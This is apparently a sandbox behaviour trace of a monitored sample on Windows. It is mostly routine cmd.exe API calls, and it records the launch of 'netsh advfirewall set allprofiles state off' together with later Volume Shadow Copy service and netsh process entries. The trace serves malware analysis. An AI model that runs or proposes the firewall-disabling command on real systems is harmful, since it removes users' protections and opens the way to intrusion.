[0114.298] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ac3a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0114.299] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ac3a460, cchData=32 | out: lpLCData="Tue") returned 4 [0114.299] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ac3a420, cchData=32 | out: lpLCData="Wed") returned 4 [0114.299] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ac3a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0114.299] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ac3a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0114.299] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4ac3a360, cchData=32 | out: lpLCData="Sat") returned 4 [0114.299] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ac3a700, cchData=32 | out: lpLCData="Sun") returned 4 [0114.300] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ac27b40, cchData=8 | out: lpLCData=".") returned 2 [0114.300] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ac3a4e0, cchData=8 | out: lpLCData=",") returned 2 [0114.300] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0114.300] GetProcessHeap () returned 0x270000 [0114.301] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20c) returned 0x289720 [0114.301] GetConsoleTitleW (in: lpConsoleTitle=0x289720, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\sysnative\\cmd.exe") returned 0x1c [0114.301] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0114.301] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0114.301] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0114.301] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0114.302] GetProcessHeap () returned 0x270000 [0114.302] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x4012) returned 0x28ce00 [0114.302] 
GetProcessHeap () returned 0x270000 [0114.302] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x28ce00 | out: hHeap=0x270000) returned 1 [0114.302] _wcsicmp (_String1="netsh", _String2=")") returned 69 [0114.302] _wcsicmp (_String1="FOR", _String2="netsh") returned -8 [0114.302] _wcsicmp (_String1="FOR/?", _String2="netsh") returned -8 [0114.302] _wcsicmp (_String1="IF", _String2="netsh") returned -5 [0114.303] _wcsicmp (_String1="IF/?", _String2="netsh") returned -5 [0114.303] _wcsicmp (_String1="REM", _String2="netsh") returned 4 [0114.303] _wcsicmp (_String1="REM/?", _String2="netsh") returned 4 [0114.303] GetProcessHeap () returned 0x270000 [0114.303] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xb0) returned 0x289940 [0114.303] GetProcessHeap () returned 0x270000 [0114.303] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1c) returned 0x284670 [0114.304] GetProcessHeap () returned 0x270000 [0114.304] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x5e) returned 0x289a00 [0114.306] GetConsoleTitleW (in: lpConsoleTitle=0x1ef410, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\sysnative\\cmd.exe") returned 0x1c [0114.306] _wcsicmp (_String1="netsh", _String2="DIR") returned 10 [0114.306] _wcsicmp (_String1="netsh", _String2="ERASE") returned 9 [0114.306] _wcsicmp (_String1="netsh", _String2="DEL") returned 10 [0114.306] _wcsicmp (_String1="netsh", _String2="TYPE") returned -6 [0114.306] _wcsicmp (_String1="netsh", _String2="COPY") returned 11 [0114.307] _wcsicmp (_String1="netsh", _String2="CD") returned 11 [0114.307] _wcsicmp (_String1="netsh", _String2="CHDIR") returned 11 [0114.307] _wcsicmp (_String1="netsh", _String2="RENAME") returned -4 [0114.307] _wcsicmp (_String1="netsh", _String2="REN") returned -4 [0114.307] _wcsicmp (_String1="netsh", _String2="ECHO") returned 9 [0114.307] _wcsicmp (_String1="netsh", _String2="SET") returned -5 [0114.307] _wcsicmp (_String1="netsh", _String2="PAUSE") returned -2 [0114.307] _wcsicmp 
(_String1="netsh", _String2="DATE") returned 10 [0114.307] _wcsicmp (_String1="netsh", _String2="TIME") returned -6 [0114.307] _wcsicmp (_String1="netsh", _String2="PROMPT") returned -2 [0114.307] _wcsicmp (_String1="netsh", _String2="MD") returned 1 [0114.307] _wcsicmp (_String1="netsh", _String2="MKDIR") returned 1 [0114.307] _wcsicmp (_String1="netsh", _String2="RD") returned -4 [0114.307] _wcsicmp (_String1="netsh", _String2="RMDIR") returned -4 [0114.307] _wcsicmp (_String1="netsh", _String2="PATH") returned -2 [0114.307] _wcsicmp (_String1="netsh", _String2="GOTO") returned 7 [0114.307] _wcsicmp (_String1="netsh", _String2="SHIFT") returned -5 [0114.307] _wcsicmp (_String1="netsh", _String2="CLS") returned 11 [0114.307] _wcsicmp (_String1="netsh", _String2="CALL") returned 11 [0114.307] _wcsicmp (_String1="netsh", _String2="VERIFY") returned -8 [0114.307] _wcsicmp (_String1="netsh", _String2="VER") returned -8 [0114.308] _wcsicmp (_String1="netsh", _String2="VOL") returned -8 [0114.308] _wcsicmp (_String1="netsh", _String2="EXIT") returned 9 [0114.308] _wcsicmp (_String1="netsh", _String2="SETLOCAL") returned -5 [0114.308] _wcsicmp (_String1="netsh", _String2="ENDLOCAL") returned 9 [0114.308] _wcsicmp (_String1="netsh", _String2="TITLE") returned -6 [0114.308] _wcsicmp (_String1="netsh", _String2="START") returned -5 [0114.308] _wcsicmp (_String1="netsh", _String2="DPATH") returned 10 [0114.308] _wcsicmp (_String1="netsh", _String2="KEYS") returned 3 [0114.308] _wcsicmp (_String1="netsh", _String2="MOVE") returned 1 [0114.308] _wcsicmp (_String1="netsh", _String2="PUSHD") returned -2 [0114.308] _wcsicmp (_String1="netsh", _String2="POPD") returned -2 [0114.308] _wcsicmp (_String1="netsh", _String2="ASSOC") returned 13 [0114.308] _wcsicmp (_String1="netsh", _String2="FTYPE") returned 8 [0114.308] _wcsicmp (_String1="netsh", _String2="BREAK") returned 12 [0114.308] _wcsicmp (_String1="netsh", _String2="COLOR") returned 11 [0114.308] _wcsicmp (_String1="netsh", 
_String2="MKLINK") returned 1 [0114.308] _wcsicmp (_String1="netsh", _String2="DIR") returned 10 [0114.308] _wcsicmp (_String1="netsh", _String2="ERASE") returned 9 [0114.308] _wcsicmp (_String1="netsh", _String2="DEL") returned 10 [0114.308] _wcsicmp (_String1="netsh", _String2="TYPE") returned -6 [0114.308] _wcsicmp (_String1="netsh", _String2="COPY") returned 11 [0114.308] _wcsicmp (_String1="netsh", _String2="CD") returned 11 [0114.308] _wcsicmp (_String1="netsh", _String2="CHDIR") returned 11 [0114.308] _wcsicmp (_String1="netsh", _String2="RENAME") returned -4 [0114.308] _wcsicmp (_String1="netsh", _String2="REN") returned -4 [0114.309] _wcsicmp (_String1="netsh", _String2="ECHO") returned 9 [0114.309] _wcsicmp (_String1="netsh", _String2="SET") returned -5 [0114.309] _wcsicmp (_String1="netsh", _String2="PAUSE") returned -2 [0114.309] _wcsicmp (_String1="netsh", _String2="DATE") returned 10 [0114.309] _wcsicmp (_String1="netsh", _String2="TIME") returned -6 [0114.309] _wcsicmp (_String1="netsh", _String2="PROMPT") returned -2 [0114.309] _wcsicmp (_String1="netsh", _String2="MD") returned 1 [0114.309] _wcsicmp (_String1="netsh", _String2="MKDIR") returned 1 [0114.309] _wcsicmp (_String1="netsh", _String2="RD") returned -4 [0114.309] _wcsicmp (_String1="netsh", _String2="RMDIR") returned -4 [0114.309] _wcsicmp (_String1="netsh", _String2="PATH") returned -2 [0114.309] _wcsicmp (_String1="netsh", _String2="GOTO") returned 7 [0114.309] _wcsicmp (_String1="netsh", _String2="SHIFT") returned -5 [0114.309] _wcsicmp (_String1="netsh", _String2="CLS") returned 11 [0114.309] _wcsicmp (_String1="netsh", _String2="CALL") returned 11 [0114.309] _wcsicmp (_String1="netsh", _String2="VERIFY") returned -8 [0114.309] _wcsicmp (_String1="netsh", _String2="VER") returned -8 [0114.309] _wcsicmp (_String1="netsh", _String2="VOL") returned -8 [0114.309] _wcsicmp (_String1="netsh", _String2="EXIT") returned 9 [0114.309] _wcsicmp (_String1="netsh", _String2="SETLOCAL") returned -5 
[0114.309] _wcsicmp (_String1="netsh", _String2="ENDLOCAL") returned 9 [0114.309] _wcsicmp (_String1="netsh", _String2="TITLE") returned -6 [0114.309] _wcsicmp (_String1="netsh", _String2="START") returned -5 [0114.309] _wcsicmp (_String1="netsh", _String2="DPATH") returned 10 [0114.309] _wcsicmp (_String1="netsh", _String2="KEYS") returned 3 [0114.309] _wcsicmp (_String1="netsh", _String2="MOVE") returned 1 [0114.309] _wcsicmp (_String1="netsh", _String2="PUSHD") returned -2 [0114.309] _wcsicmp (_String1="netsh", _String2="POPD") returned -2 [0114.310] _wcsicmp (_String1="netsh", _String2="ASSOC") returned 13 [0114.310] _wcsicmp (_String1="netsh", _String2="FTYPE") returned 8 [0114.310] _wcsicmp (_String1="netsh", _String2="BREAK") returned 12 [0114.310] _wcsicmp (_String1="netsh", _String2="COLOR") returned 11 [0114.310] _wcsicmp (_String1="netsh", _String2="MKLINK") returned 1 [0114.310] _wcsicmp (_String1="netsh", _String2="FOR") returned 8 [0114.310] _wcsicmp (_String1="netsh", _String2="IF") returned 5 [0114.310] _wcsicmp (_String1="netsh", _String2="REM") returned -4 [0114.310] GetProcessHeap () returned 0x270000 [0114.310] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x218) returned 0x289a70 [0114.310] GetProcessHeap () returned 0x270000 [0114.310] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x6a) returned 0x289c90 [0114.311] _wcsnicmp (_String1="nets", _String2="cmd ", _MaxCount=0x4) returned 11 [0114.311] GetProcessHeap () returned 0x270000 [0114.311] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x420) returned 0x271320 [0114.311] SetErrorMode (uMode=0x0) returned 0x0 [0114.312] SetErrorMode (uMode=0x1) returned 0x0 [0114.312] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x271330, lpFilePart=0x1eeca0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1eeca0*="Desktop") returned 0x25 [0114.312] SetErrorMode (uMode=0x0) returned 0x1 [0114.312] GetProcessHeap () returned 0x270000 
[0114.312] RtlReAllocateHeap (Heap=0x270000, Flags=0x0, Ptr=0x271320, Size=0x68) returned 0x271320 [0114.312] GetProcessHeap () returned 0x270000 [0114.312] RtlSizeHeap (HeapHandle=0x270000, Flags=0x0, MemoryPointer=0x271320) returned 0x68 [0114.312] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac1f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0114.313] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0114.313] GetProcessHeap () returned 0x270000 [0114.313] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x128) returned 0x289d10 [0114.313] GetProcessHeap () returned 0x270000 [0114.313] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x240) returned 0x2713a0 [0114.322] GetProcessHeap () returned 0x270000 [0114.322] RtlReAllocateHeap (Heap=0x270000, Flags=0x0, Ptr=0x2713a0, Size=0x12a) returned 0x2713a0 [0114.322] GetProcessHeap () returned 0x270000 [0114.322] RtlSizeHeap (HeapHandle=0x270000, Flags=0x0, MemoryPointer=0x2713a0) returned 0x12a [0114.322] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac1f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0114.322] GetProcessHeap () returned 0x270000 [0114.323] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xe8) returned 0x289e40 [0114.323] GetProcessHeap () returned 0x270000 [0114.323] RtlReAllocateHeap (Heap=0x270000, Flags=0x0, Ptr=0x289e40, Size=0x7e) returned 0x289e40 [0114.323] GetProcessHeap () returned 0x270000 [0114.323] RtlSizeHeap (HeapHandle=0x270000, Flags=0x0, MemoryPointer=0x289e40) returned 0x7e [0114.328] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0114.328] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\netsh.*", fInfoLevelId=0x1, lpFindFileData=0x1eea10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eea10) 
returned 0xffffffffffffffff [0114.328] GetLastError () returned 0x2 [0114.328] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\netsh", fInfoLevelId=0x1, lpFindFileData=0x1eea10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eea10) returned 0xffffffffffffffff [0114.328] GetLastError () returned 0x2 [0114.328] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0114.329] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\netsh.*", fInfoLevelId=0x1, lpFindFileData=0x1eea10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eea10) returned 0x289ed0 [0114.329] GetProcessHeap () returned 0x270000 [0114.329] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x28) returned 0x2846a0 [0114.329] FindClose (in: hFindFile=0x289ed0 | out: hFindFile=0x289ed0) returned 1 [0114.329] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\netsh.COM", fInfoLevelId=0x1, lpFindFileData=0x1eea10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eea10) returned 0xffffffffffffffff [0114.329] GetLastError () returned 0x2 [0114.329] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\netsh.EXE", fInfoLevelId=0x1, lpFindFileData=0x1eea10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eea10) returned 0x289ed0 [0114.329] GetProcessHeap () returned 0x270000 [0114.329] RtlReAllocateHeap (Heap=0x270000, Flags=0x0, Ptr=0x2846a0, Size=0x8) returned 0x2889e0 [0114.329] FindClose (in: hFindFile=0x289ed0 | out: hFindFile=0x289ed0) returned 1 [0114.329] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0114.329] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0114.330] GetConsoleTitleW (in: lpConsoleTitle=0x1eef60, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\sysnative\\cmd.exe") returned 0x1c [0114.330] InitializeProcThreadAttributeList (in: lpAttributeList=0x1eed18, dwAttributeCount=0x1, dwFlags=0x0, 
lpSize=0x1eecd8 | out: lpAttributeList=0x1eed18, lpSize=0x1eecd8) returned 1 [0114.330] UpdateProcThreadAttribute (in: lpAttributeList=0x1eed18, dwFlags=0x0, Attribute=0x60001, lpValue=0x1eecc8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1eed18, lpPreviousValue=0x0) returned 1 [0114.330] GetStartupInfoW (in: lpStartupInfo=0x1eee30 | out: lpStartupInfo=0x1eee30*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0114.330] GetProcessHeap () returned 0x270000 [0114.330] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x20) returned 0x2846a0 [0114.330] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0114.330] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0114.330] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0114.330] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.330] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.330] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.330] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0114.330] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0114.330] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0114.330] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0114.331] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0114.331] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0114.331] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 
[0114.331] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0114.331] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0114.331] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0114.331] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0114.331] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.331] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.331] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.331] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.331] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.331] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.331] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.331] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.331] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0114.331] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0114.331] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0114.331] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0114.331] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0114.331] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0114.332] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0114.332] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0114.332] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0114.332] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0114.332] 
_wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0114.332] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0114.332] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0114.332] GetProcessHeap () returned 0x270000 [0114.332] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2846a0 | out: hHeap=0x270000) returned 1 [0114.332] GetProcessHeap () returned 0x270000 [0114.332] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12) returned 0x289ed0 [0114.332] lstrcmpW (lpString1="\\netsh.exe", lpString2="\\XCOPY.EXE") returned -1 [0114.333] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\netsh.exe", lpCommandLine="netsh advfirewall set allprofiles state off", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1eed50*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="netsh advfirewall set allprofiles state off", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1eed00 | out: lpCommandLine="netsh advfirewall set allprofiles state off", lpProcessInformation=0x1eed00*(hProcess=0x54, hThread=0x50, dwProcessId=0x4fc, dwThreadId=0x570)) returned 1 [0115.289] CloseHandle (hObject=0x50) returned 1 [0115.289] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0115.289] GetProcessHeap () returned 0x270000 [0115.289] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x28c310 | out: hHeap=0x270000) returned 1 [0115.289] GetEnvironmentStringsW () returned 0x28ad10* [0115.289] GetProcessHeap () returned 0x270000 [0115.289] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xae8) returned 0x28b800 [0115.290] 
FreeEnvironmentStringsW (penv=0x28ad10) returned 1 [0115.290] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0231.753] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x1eec48 | out: lpExitCode=0x1eec48*=0x0) returned 1 [0231.753] CloseHandle (hObject=0x54) returned 1 [0231.753] _vsnwprintf (in: _Buffer=0x1eeeb8, _BufferCount=0x13, _Format="%08X", _ArgList=0x1eec58 | out: _Buffer="00000000") returned 8 [0231.753] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0231.754] GetProcessHeap () returned 0x270000 [0231.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x28b800 | out: hHeap=0x270000) returned 1 [0231.754] GetEnvironmentStringsW () returned 0x28ad10* [0231.754] GetProcessHeap () returned 0x270000 [0231.754] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xb0e) returned 0x28ce10 [0231.754] FreeEnvironmentStringsW (penv=0x28ad10) returned 1 [0231.754] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0231.754] GetProcessHeap () returned 0x270000 [0231.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x28ce10 | out: hHeap=0x270000) returned 1 [0231.754] GetEnvironmentStringsW () returned 0x28ad10* [0231.754] GetProcessHeap () returned 0x270000 [0231.754] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xb0e) returned 0x28ce10 [0231.754] FreeEnvironmentStringsW (penv=0x28ad10) returned 1 [0231.754] GetProcessHeap () returned 0x270000 [0231.754] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x289ed0 | out: hHeap=0x270000) returned 1 [0231.754] DeleteProcThreadAttributeList (in: lpAttributeList=0x1eed18 | out: lpAttributeList=0x1eed18) [0231.754] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.754] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0231.755] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.755] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac1e194 | out: lpMode=0x4ac1e194) returned 1 [0231.755] _get_osfhandle 
(_FileHandle=0) returned 0x3 [0231.755] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac1e198 | out: lpMode=0x4ac1e198) returned 1 [0231.756] SetConsoleInputExeNameW () returned 0x1 [0231.756] GetConsoleOutputCP () returned 0x1b5 [0231.756] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac2bfe0 | out: lpCPInfo=0x4ac2bfe0) returned 1 [0231.756] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0231.756] exit (_Code=0) Process: id = "6" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x47411000" os_pid = "0x564" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005ab2f" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 15 os_tid = 0x604 Thread: id = 16 os_tid = 0x3d4 Thread: id = 17 os_tid = 0x5a8 Thread: id = 18 os_tid = 0x40c [0115.250] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xced5e0 | out: lpSystemTimeAsFileTime=0xced5e0*(dwLowDateTime=0x2d2a4de0, dwHighDateTime=0x1d5f7c9)) [0115.251] GetCurrentProcessId () returned 0x564 [0115.251] GetCurrentThreadId () returned 0x40c [0115.251] GetTickCount () returned 0x114a554 [0115.251] QueryPerformanceCounter (in: lpPerformanceCount=0xced5e8 | out: lpPerformanceCount=0xced5e8*=22127429043) returned 1 [0115.251] malloc (_Size=0x100) returned 0x3e8e80 [0264.002] free (_Block=0x3e8e80) Thread: id = 19 os_tid = 0x7cc Thread: id = 20 os_tid = 0x620 Thread: id = 21 os_tid = 0x560 Thread: id = 25 os_tid = 0x83c Thread: id = 32 os_tid = 0xa80 Thread: id = 129 os_tid = 0x874 Process: id = "7" 
image_name = "netsh.exe" filename = "c:\\windows\\system32\\netsh.exe" page_root = "0x491be000" os_pid = "0x4fc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x694" cmd_line = "netsh advfirewall set allprofiles state off" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 22 os_tid = 0x570 [0117.028] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14f990 | out: lpSystemTimeAsFileTime=0x14f990*(dwLowDateTime=0x2d8984e0, dwHighDateTime=0x1d5f7c9)) [0117.028] GetCurrentProcessId () returned 0x4fc [0117.028] GetCurrentThreadId () returned 0x570 [0117.028] GetTickCount () returned 0x114a7c4 [0117.028] QueryPerformanceCounter (in: lpPerformanceCount=0x14f998 | out: lpPerformanceCount=0x14f998*=22305172888) returned 1 [0117.030] GetModuleHandleW (lpModuleName=0x0) returned 0xc90000 [0117.030] __set_app_type (_Type=0x1) [0117.031] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xc9ad14) returned 0x0 [0117.031] __wgetmainargs (in: _Argc=0xca55c0, _Argv=0xca55d0, _Env=0xca55c8, _DoWildCard=0, _StartInfo=0xca55dc | out: _Argc=0xca55c0, _Argv=0xca55d0, _Env=0xca55c8) returned 0 [0117.033] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0117.033] GetModuleHandleW (lpModuleName=0x0) returned 0xc90000 [0117.034] _vsnwprintf (in: _Buffer=0xca7a40, _BufferCount=0x1fff, _Format="%s>", _ArgList=0x1474e8 | out: _Buffer="netsh>") returned 6 [0117.034] GetProcessHeap () 
